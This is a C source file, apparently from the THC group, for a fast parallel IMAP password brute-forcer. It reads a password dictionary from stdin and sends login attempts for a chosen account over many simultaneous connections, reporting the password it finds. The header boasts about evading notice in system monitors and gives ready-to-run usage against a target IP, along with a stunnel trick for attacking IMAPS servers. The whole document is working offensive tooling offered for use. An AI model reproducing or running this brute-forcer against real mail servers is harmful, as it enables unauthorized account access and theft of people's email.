/*
 * IMAP bruter. Coded this in a hurry. hydra was to slow (and sucked 100% cpu).
 * I had this one running with 30 passwords / second (100 parallel connections)
 * against a single server and it did not even appear in top.
 *
 * Visit us -- your enemies already did.
 * http://www.thc.org - THE HACKERS CHOICE
 *
 * gcc -Wall -O2 -g -o imap_bruter imap_bruter.c
 *
 * SSL support for dummies:
 * stunnel -c -d 127.0.0.1:9993 -f -r imap.theirdomain.com:993
 *
 * Example: (Brute 40 in parallel)
 * ./imap_bruter -r 1.2.3.4 -l carol -n 60 <dictionary.txt
 */
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>

struct peer_str
{
	char password[64];
	char buf[256];
	int sox;
	int read;
	char flags;
	time_t time;
};

#define FL_CONNECTED		(0x01)
#define FL_HEADERREAD		(0x02)

#define ERREXIT(a...)	do { \
	fprintf(stderr, "%s:%d ", __func__, __LINE__); \
	fprintf(stderr, a); \
	exit(-1); \
} while (0)

static char g_flags;
#define FL_FINISHED		(0x04) /* wordlist finished */
static unsigned short g_port;
static unsigned int g_ip;
static char *g_login;
static unsigned int g_parallel;
time_t time_now;
static fd_set g_rfds, g_wfds;
static unsigned int cracks;
static char *g_passwd;
static int n_peers;

struct peer_str peers[1024];
	
static unsigned int
hostname(char *host)
{
	struct hostent *he;
	int ip;

	if ( (ip = inet_addr(host)) != -1)
		return ip;
	if ( (he = gethostbyname(host)) == NULL)
		return -1;

	if (he->h_length != 4)
		return -1;
	return *(int *)he->h_addr;
}

int tcp_socket_connect(unsigned int ip, unsigned short port)
{
	int fd;
	struct sockaddr_in addr;
	int i;

	if ((fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
		return -1;

	memset(&addr, 0, sizeof addr);
	addr.sin_family = PF_INET;
	addr.sin_addr.s_addr = ip;
	addr.sin_port = port;

	if (connect(fd, (struct sockaddr *)&addr, sizeof addr) != 0)
	{
		close(fd);
		return -1;
	}
	i = i;
	setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &i, sizeof i);
	fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK);

	return fd;
}

static void
usage(void)
{
	fprintf(stderr, ""
"imap-bruter [rlpn]\n"
"Options:\n"
"  -r <ip address> - Server imapd runs on. [default: 127.0.0.1]\n"
"  -p <port>       - Port imapd runs on. [default: 143]\n"
"  -l <login name> - Login name\n"
"  -n <parallel>   - Number of parallel connections.\n"
"Passwords are read from stdin. Stunnel can be used if IMAPS is in place.\n"
"");
	exit(0);
}

static void
do_getopt(int argc, char *argv[])
{
	int c;

	g_port = 143;
	g_parallel = 5;

	while ((c = getopt(argc, argv, "r:l:p:n:")) != -1)
	{
		switch (c)
		{
		case 'r':
			g_ip = hostname(optarg);
			break;
		case 'l':
			g_login = strdup(optarg);
			break;
		case 'p':
			g_port = atoi(optarg);
			break;
		case 'n':
			g_parallel = atoi(optarg);
			break;
		default:
			usage();
			break;
		}
	}

	if (g_ip == -1)
	{
		fprintf(stderr, "Unknown host!\n");
		usage();
	}
	if (!g_login)
		usage();
	if (g_parallel <= 0)
		usage();
}

static void
peer_clear(struct peer_str *p)
{
	if (p->sox >= 0)
		close(p->sox);
	p->sox = -1;
	p->read = 0;
	p->flags = 0;
	/* Keep 'password' as it has not yet been processed */
	n_peers--;
}

static int
do_readpwd(struct peer_str *p)
{
	char *ptr;

	if (g_flags & FL_FINISHED)
		return -1;
	cracks++;
	memset(p->password, 0, sizeof p->password);
	if (fgets(p->password, sizeof p->password - 1, stdin) == NULL)
		return -1;

	g_passwd = p->password;
	ptr = strchr(p->password, '\n');
	if (ptr)
		*ptr = '\0';

	return 0;
}

/*
 * Socket ready for reading. Read line.
 */
void
do_read(struct peer_str *p)
{
	ssize_t n;
	char *ptr;
	char buf[1024];

	n = read(p->sox, p->buf + p->read, sizeof p->buf - p->read - 1);
	if (n <= 0)
		goto err;
	p->read += n;

	if (p->read + 1 >= sizeof p->buf)
		goto err;
	p->buf[p->read] = '\0';
	ptr = strchr(p->buf, '\n');
	if (!ptr)
		return;
	p->time = time_now;
	if (p->flags & FL_HEADERREAD)
	{
		if (strstr(p->buf, " NO") == NULL)
		{
			printf("FOUND '%s'\n", p->password);
			exit(0);
		}
		if (do_readpwd(p) != 0)
		{
			g_flags |= FL_FINISHED;
			goto err;
		}
	} else {
		p->flags |= FL_HEADERREAD;
		if (p->password[0] == '\0')
		{
			if (do_readpwd(p) != 0)
			{
				g_flags |= FL_FINISHED;
				goto err;
			}
		}
	}

	snprintf(buf, sizeof buf, "1 login \"%.100s\" \"%.100s\"\r\n", g_login, p->password);
	n = strlen(buf);
	if (write(p->sox, buf, n) != n)
	{
		/* Write should not fail. Linux kernel always has 1024 write
		 * buffer for us.
		 */
		 goto err;
	}

	return;
err:
	peer_clear(p);
}

static void
peer_init(struct peer_str *p)
{
	p->sox = -1;
	p->read = 0;
}

int
main(int argc, char *argv[])
{
	struct timeval tv;
	int conn;
	int maxfd;
	struct peer_str *p;
	int i, n;
	int ret;
	socklen_t len;
	time_t time_last, time_start;
	unsigned int hours, min, sec;
	unsigned int old_cracks = 0;
	double cs;

	g_passwd = "<waiting...>";
	do_getopt(argc, argv);
	time_now = time(NULL);
	time_start = time_now;
	time_last = time_now;
	printf("Bruting '%s' with %d in parallel\n", g_login, g_parallel);
	for (i = 0; i < g_parallel; i++)
		peer_init(&peers[i]);

	while (1)
	{
		tv.tv_sec = 1;
		tv.tv_usec = 0;
		FD_ZERO(&g_rfds);
		FD_ZERO(&g_wfds);
		conn = 0;
		maxfd = 0;
		for (i = 0; i < g_parallel; i++)
		{
			if (peers[i].sox >= 0)
			{
				if (peers[i].flags & FL_CONNECTED)
					FD_SET(peers[i].sox, &g_rfds);
				else
					FD_SET(peers[i].sox, &g_wfds);
			} else if ((conn < 5) && (!(g_flags & FL_FINISHED))) {
				peers[i].time = time_now;
				peers[i].sox = tcp_socket_connect(g_ip, htons(g_port));
				if (peers[i].sox >= 0)
					FD_SET(peers[i].sox, &g_wfds);
				conn++;
			}
			if (peers[i].sox > maxfd)
				maxfd = peers[i].sox;
		}
		if (maxfd == 0)
		{
			fprintf(stderr, "Finished %u cracks after %lu sec.\n", cracks, time_now - time_start);
			exit(0);
		}
		n = select(maxfd + 1, &g_rfds, &g_wfds, NULL, &tv);
		time_now = time(NULL);
		if ((time_last < time_now) && (old_cracks != cracks))
		{
			sec = time_now - time_start;
			hours = sec / 3600;
			min = (sec - hours * 3600) / 60;
			sec = sec % 60;
			cs = ((float)cracks) / ((float)(time_now - time_start));
			fprintf(stderr, "[%u:%02u:%02u] total: %d with %d peers: '%s' (%1.03f c/s)\n", hours, min, sec, cracks, n_peers, g_passwd, cs);
			time_last = time_now;
			old_cracks = cracks;
		}

		for (i = 0; i < g_parallel; i++)
		{
			p = &peers[i];
			if (p->sox < 0)
				continue;

			if (p->time + 30 < time_now)
			{
				fprintf(stderr, "TIMEOUT on socket...\n");
				peer_clear(p);
				continue;
			}

			if (FD_ISSET(p->sox, &g_wfds))
			{
				len = sizeof ret;
				ret = 0;
				if ((getsockopt(p->sox, SOL_SOCKET, SO_ERROR, &ret, &len) != 0) || (ret != 0))
					peer_clear(p);
				else {
					p->flags |= FL_CONNECTED;
					n_peers++;
				}

			} else if (FD_ISSET(p->sox, &g_rfds)) {
				do_read(p);
			}
		} /* for through all peers.. */
	}
}